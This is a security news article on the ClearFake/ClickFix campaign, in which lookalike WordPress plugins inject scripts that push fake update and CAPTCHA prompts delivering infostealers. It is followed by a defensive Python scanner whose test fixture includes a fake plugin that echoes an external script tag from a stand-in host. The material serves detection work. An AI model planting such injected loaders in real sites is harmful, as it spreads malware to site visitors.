A new wave of cyberattacks is targeting WordPress sites, installing malicious plugins that push information-stealing malware through fake software updates and error messages.

This campaign, known as ClearFake since 2023, is responsible for displaying fraudulent browser update banners on compromised websites. In 2024, a similar attack called ClickFix emerged, which mimics software error messages and suggests fake “fixes” that execute PowerShell scripts to install malware.

Recent reports indicate that over 6,000 WordPress sites have been breached by threat actors deploying these malicious plugins. The compromised plugins display alerts pretending to be from Google Chrome, Facebook, Google Meet, and even CAPTCHA pages, tricking users into executing malware.

GoDaddy security researcher Denis Sinegubko reported that these plugins are designed to look like legitimate tools, often mimicking well-known plugins such as Wordfence Security and LiteSpeed Cache. However, they embed malicious JavaScript that is injected into the site's HTML. That injected code attempts to load additional JavaScript from external sources such as Binance Smart Chain (BSC), which in turn deliver the ClearFake or ClickFix payloads that display the deceptive banners.


The following malicious plugins have been identified between June and September 2024:

  • LiteSpeed Cache Classic
  • Wordfence Security Classic
  • MonsterInsights Classic
  • SEO Booster Pro
  • Rank Booster Pro
  • Google SEO Enhancer
  • Universal Popup Plugin (among others)

Threat actors use stolen admin credentials to log in automatically to the WordPress site, bypassing the usual login process. The breach likely stems from brute-force attacks, phishing, or prior information-stealing malware campaigns.


If you notice fake alerts on your WordPress site, immediately review your installed plugins. Remove any that you do not recognize or did not install yourself. Reset your admin passwords and ensure that they are unique and secure. This proactive measure is essential in preventing further exploitation.
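As an added example (not from the article or from GoDaddy's research), the script below automates the plugin review described above: it reads each plugin's `Plugin Name:` header under a `wp-content/plugins` directory, flags names matching the lookalike plugins listed above, and flags PHP files that hook `wp_head`/`wp_footer` and emit an external `<script src=...>`, which is the injection pattern described earlier. The sample plugin tree, the `example.invalid` host and the function names are constructed for this illustration.

```python
import os, re, tempfile

# Lookalike plugin names reported for the June-September 2024 campaign (from the article).
KNOWN_FAKE_NAMES = {
    "LiteSpeed Cache Classic", "Wordfence Security Classic", "MonsterInsights Classic",
    "SEO Booster Pro", "Rank Booster Pro", "Google SEO Enhancer", "Universal Popup Plugin",
}
HEADER_RE = re.compile(r"Plugin Name:\s*(.+)")
# Hooking wp_head/wp_footer to emit an external <script src=...> is the injection
# pattern described above. It is a heuristic only: some legitimate plugins do this too.
HOOK_RE = re.compile(r"add_action\(\s*['\"]wp_(head|footer)['\"]")
EXT_SCRIPT_RE = re.compile(r"<script[^>]+src=[\"']https?://")

def scan_plugins(plugins_dir):
    """Return [(slug, plugin_name, [reasons])] for plugins that deserve a manual look."""
    findings = []
    for slug in sorted(os.listdir(plugins_dir)):
        path = os.path.join(plugins_dir, slug)
        if not os.path.isdir(path):
            continue
        name, reasons = None, []
        for root, _, files in os.walk(path):
            for fname in sorted(f for f in files if f.endswith(".php")):
                with open(os.path.join(root, fname), encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
                m = HEADER_RE.search(src)
                if m and name is None:
                    name = m.group(1).strip()  # first header found is the plugin's display name
                if HOOK_RE.search(src) and EXT_SCRIPT_RE.search(src):
                    reasons.append(f"{fname}: hooks wp_head/wp_footer and emits external <script>")
        if name in KNOWN_FAKE_NAMES:
            reasons.insert(0, f"plugin header name matches a reported fake: {name!r}")
        if reasons:
            findings.append((slug, name, reasons))
    return findings

def build_sample_dir():
    """Constructed sample tree: one benign plugin and one lookalike that injects a script."""
    d = tempfile.mkdtemp()
    os.makedirs(os.path.join(d, "hello-dolly"))
    with open(os.path.join(d, "hello-dolly", "hello.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Hello Dolly\n*/\nfunction hello() { echo 'hi'; }\n")
    os.makedirs(os.path.join(d, "wordfence-classic"))
    with open(os.path.join(d, "wordfence-classic", "wf.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Wordfence Security Classic\n*/\n"
                 "add_action('wp_footer', function () {\n"
                 "  echo '<script src=\"https://loader.example.invalid/x.js\"></script>';\n});\n")
    return d
```

Point `scan_plugins` at a real `wp-content/plugins` directory to review a live site; every hit still needs a human check, since the external-script rule also matches some legitimate plugins.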